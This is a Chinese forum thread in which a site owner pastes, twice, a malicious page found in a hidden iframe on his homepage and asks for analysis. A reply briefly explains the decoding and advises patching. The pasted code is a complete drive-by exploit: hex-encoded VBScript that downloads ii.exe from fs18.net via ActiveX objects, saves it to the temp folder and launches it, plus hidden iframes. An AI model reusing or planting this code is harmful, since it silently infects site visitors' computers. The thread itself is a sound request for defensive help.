网站首页嵌套了一个<iframe src=http://fs18.net/down8/dd.htm width=20 height=0 frameborder=0></iframe>我把页面http://fs18.net/down8/dd.htm下载下来后是下面的代码,请高手帮我分析下啊!<html>
<body>
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language="VBScript">
flag_type="vbs"
S="6f6E206572726F7220726573756d65206E6578740D0a6375726c3D22687474703A2F2f667331382E6E65742F646f776E382f"
S=S+"69692e657865220D0a666E616D65313D2269692e657865220D0a666e616d65323d2269692e766273220d0a53657420646620"
S=S+"3D20646F63756D656E742E637265617465456C656d656E7428226F626A65637422290D0a64662e7365744174747269627574"
S=S+"652022636c6173736964222C2022636C7369643A42443936433535362D363541332D313144302d393833412d303043303446"
S=S+"433239453336220D0a7374723D224D6963726f736F66742e584d4c48545450220d0a5365742078203d2064662e4372656174"
S=S+"654F626A656374287374722C2222290D0A43313D2241646f220D0A43323d2264622e220D0A43333D22737472220D0A43343D"
S=S+"2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0a7365742053203d2064662E637265"
S=S+"6174656f626A65637428737472352c2222290D0a532e74797065203d20310D0A737472363D22474554220d0a782e4F70656e"
S=S+"20737472362C206375726c2C2046616C73650D0a782E53656E640d0a73313d22536372697074220d0a73323d22696E672E22"
S=S+"0d0a73333D2246696C65220D0a73343d2253797374656D4F626a656374220d0a73303D73312B73322b73332B73340d0a7365"
S=S+"742046203D2064662E6372656174656f626a6563742873302C2222290d0a73657420746d70203d20462e4765745370656369"
S=S+"616C466F6c6465722832290D0a666E616d65313d20462e4275696c645061746828746D702c666E616D6531290D0a532e6f70"
S=S+"656E0D0A532e777269746520782e726573706F6e7365426F64790D0A532e73617665746f66696c6520666E616d65312C320d"
S=S+"0A532E636C6f73650D0A666e616d65323D20462E4275696C645061746828746D702C666e616d6532290D0A53657420747320"
S=S+"3d20462E4f70656e5465787446696c6528666e616D65322C20322C2054727565290d0A74732E57726974654C696E65202253"
S=S+"6574205368656c6C203D204372656174654f626A656374282222577363726970742E5368656c6C222229220d0A73716C3D22"
S=S+"5368656c6C2e52756E282222222b666e616d65312B22222229220D0A74732e57726974654c696E652073716c0d0A74732E57"
S=S+"726974654C696e652022736574205368656c6C3D4e6F7468696E67220D0a74732E57726974654c696E652022693d31220d0a"
S=S+"74732e636C6f73650d0a696620462e46696C6545786973747328666E616D6531293d74727565207468656e0d0a696620462E"
S=S+"46696C6545786973747328666E616d6532293d74727565207468656E0d0a202020207368613D225368656C6c2e417070220D"
S=S+"0a202020207368623D7368610d0A202020207365742051203D2064662E6372656174656f626a656374287368622b226c6963"
S=S+"6174696f6e222c2222290D0A20202020512e5368656c6c4578656375746520666E616d65322c22222c22222c226F70656e22"
S=S+"2c300D0A656E642069660d0a656e642069660D0a"
D=""
DO WHILE LEN(S)>1
k="&H"+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type="vbs" then
EXECUTE D
end if
if flag_type="html" then
document.write(D)
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
eval(D);}
</script>
</body>
</html>
<DIV style="CURSOR: url(ah.c)"></DIV>
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<script src='http://s128.cnzz.com/stat.php?id=620367&web_id=620367' language='JavaScript' charset='gb2312'></script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<body>
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language="VBScript">
flag_type="vbs"
S="6f6E206572726F7220726573756d65206E6578740D0a6375726c3D22687474703A2F2f667331382E6E65742F646f776E382f"
S=S+"69692e657865220D0a666E616D65313D2269692e657865220D0a666e616d65323d2269692e766273220d0a53657420646620"
S=S+"3D20646F63756D656E742E637265617465456C656d656E7428226F626A65637422290D0a64662e7365744174747269627574"
S=S+"652022636c6173736964222C2022636C7369643A42443936433535362D363541332D313144302d393833412d303043303446"
S=S+"433239453336220D0a7374723D224D6963726f736F66742e584d4c48545450220d0a5365742078203d2064662e4372656174"
S=S+"654F626A656374287374722C2222290D0A43313D2241646f220D0A43323d2264622e220D0A43333D22737472220D0A43343D"
S=S+"2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0a7365742053203d2064662E637265"
S=S+"6174656f626A65637428737472352c2222290D0a532e74797065203d20310D0A737472363D22474554220d0a782e4F70656e"
S=S+"20737472362C206375726c2C2046616C73650D0a782E53656E640d0a73313d22536372697074220d0a73323d22696E672E22"
S=S+"0d0a73333D2246696C65220D0a73343d2253797374656D4F626a656374220d0a73303D73312B73322b73332B73340d0a7365"
S=S+"742046203D2064662E6372656174656f626a6563742873302C2222290d0a73657420746d70203d20462e4765745370656369"
S=S+"616C466F6c6465722832290D0a666E616d65313d20462e4275696c645061746828746D702c666E616D6531290D0a532e6f70"
S=S+"656E0D0A532e777269746520782e726573706F6e7365426F64790D0A532e73617665746f66696c6520666E616d65312C320d"
S=S+"0A532E636C6f73650D0A666e616d65323D20462E4275696C645061746828746D702C666e616d6532290D0A53657420747320"
S=S+"3d20462E4f70656e5465787446696c6528666e616D65322C20322C2054727565290d0A74732E57726974654C696E65202253"
S=S+"6574205368656c6C203D204372656174654f626A656374282222577363726970742E5368656c6C222229220d0A73716C3D22"
S=S+"5368656c6C2e52756E282222222b666e616d65312B22222229220D0A74732e57726974654c696E652073716c0d0A74732E57"
S=S+"726974654C696e652022736574205368656c6C3D4e6F7468696E67220D0a74732E57726974654c696E652022693d31220d0a"
S=S+"74732e636C6f73650d0a696620462e46696C6545786973747328666E616D6531293d74727565207468656e0d0a696620462E"
S=S+"46696C6545786973747328666E616d6532293d74727565207468656E0d0a202020207368613D225368656C6c2e417070220D"
S=S+"0a202020207368623D7368610d0A202020207365742051203D2064662E6372656174656f626a656374287368622b226c6963"
S=S+"6174696f6e222c2222290D0A20202020512e5368656c6c4578656375746520666E616d65322c22222c22222c226F70656e22"
S=S+"2c300D0A656E642069660d0a656e642069660D0a"
D=""
DO WHILE LEN(S)>1
k="&H"+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type="vbs" then
EXECUTE D
end if
if flag_type="html" then
document.write(D)
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
eval(D);}
</script>
</body>
</html>
<DIV style="CURSOR: url(ah.c)"></DIV>
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<script src='http://s128.cnzz.com/stat.php?id=620367&web_id=620367' language='JavaScript' charset='gb2312'></script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
解决方案 »
- IIS中向其它机器上传文件,提示 System.IO.IOException: 登录失败: 未知的用户名或错误密码。
- IE6弹出窗口中移动窗口滚动条时里面的下拉框出现混乱了,急救(里面有截图)????
- 关于自定义空间动态生成的问题求教!
- 防止页面刷新时提交数据
- 帮我看下哪有错
- HTML 里面如果调整行距。用什么标记。
- 怎样判断一个COOKIE是否存在,比如Request.Cookies("tmpname")
- DataSet不回收会出现什么情况
- 清高手指教。。。。
- 哪位大仙知道:如何在DataGrid里面右键选中一行弹出一个菜单啊
- IE视频不能正常播放的原因!很急!!!
- 设定gridview显示列内容格定
前面s是病毒体的二进制代码
D是解码后的病毒
这句
EXECUTE D
执行
如果是服务器端本身,只有不去访问它或在你的网络出口加病毒网关防御,也可以试试打补丁的办法
如果是arp欺骗,先找到哪台感染arp病毒
总之补丁是不能不打。